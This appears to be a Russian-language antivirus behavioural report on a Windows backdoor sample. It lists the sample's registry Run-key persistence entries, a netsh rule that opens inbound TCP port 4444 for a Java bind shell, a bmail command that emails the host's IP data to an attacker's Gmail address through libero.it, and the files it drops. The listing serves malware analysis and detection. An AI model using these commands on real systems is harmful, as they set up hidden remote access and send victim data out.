Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'invio_mail' = '%WINDIR%\temp\invio.bat'
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'java_bind' = '%WINDIR%\temp\java_bind_tcp.bat'
- %WINDIR%\Temp\bmail.exe -s mail.libero.it -t alessandro.valenzano@gmail.com -h -a Ip -d -m body.txt
- %WINDIR%\Temp\java.exe -jar bind_tcp.jsp
- %WINDIR%\Temp\hide_cmd.exe invio.bat java_bind_tcp.bat
- <SYSTEM32>\cmd.exe /c java_bind_tcp.bat
- <SYSTEM32>\cmd.exe /c invio.bat
- <SYSTEM32>\ipconfig.exe
- <SYSTEM32>\netsh.exe advfirewall firewall add rule name="netcode" dir=in action=allow protocol=tcp localport=4444 remoteip=any
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\regE.bat" "
- <SYSTEM32>\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "java_bind" /t REG_SZ /d "%WINDIR%\temp\java_bind_tcp.bat" /f
- <SYSTEM32>\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "invio_mail" /t REG_SZ /d "%WINDIR%\temp\invio.bat" /f
- %WINDIR%\Temp\java_bind_tcp.bat
- %WINDIR%\Temp\java.exe
- %WINDIR%\Temp\bind_tcp.jsp
- %WINDIR%\Temp\bmail.exe
- %WINDIR%\Temp\body.txt
- %WINDIR%\Temp\hide_cmd.exe
- %WINDIR%\Temp\invio.bat
- <Текущая директория>\invio.bat
- <Текущая директория>\bmail.exe
- %TEMP%\1.tmp\regE.bat
- <Текущая директория>\java.exe
- <Текущая директория>\bind_tcp.jsp
- <Текущая директория>\hide_cmd.exe
- <Текущая директория>\java_bind_tcp.bat
- 'ma##.libero.it':25
- DNS ASK ma##.libero.it